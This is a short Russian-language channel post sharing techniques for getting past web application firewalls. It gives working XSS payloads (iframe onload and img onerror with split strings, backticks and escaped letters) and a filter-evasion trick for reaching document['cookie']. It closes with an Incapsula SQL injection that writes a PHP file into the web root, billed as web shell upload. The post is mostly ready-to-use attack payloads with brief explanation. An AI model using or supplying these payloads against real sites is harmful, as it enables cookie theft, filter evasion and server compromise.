WAF SQL Injection and XSS
@cybershit
Вот вам парочка свежих тактик против WAF от гуру всея Веба - Bo0oM'a
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
В первом случае мы редиректим текущий url фрейма (this.src) на javascript:alert(). Про 	
Не пускает точку? Например не проходит document.cookie?
Добавляем блоки document['cookie'] и точка нам больше не нужна (https://jsfiddle.net/raouvm1q/).
Не пускает alert - разбиваем на две строки, "al"+"ert".
— Джонни, но как вызвать функцию без скобок?
Да не Джонни я!1! Вместо скобок можно использовать бэктики (ну вот этот вот знак - `). Этой клавишей можно не только вызывать консольку в игре, запомни её!
— Джонни, а что за al\ert(). Ты что нюхал?
Alert во втором случае будет строкой, а \e - это экранированная e, лол. А что будет если экранировать буквы? Ничего (https://jsfiddle.net/p8965gu7/). Только не пытайся экранировать зарезервированные символы, например писать \r (возврат каретки) и \t (знак табуляции) в том же alert'е, так работать не будет.
Bonus:
Incapsula WAF SQLinj bypass & web shell upload:
' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>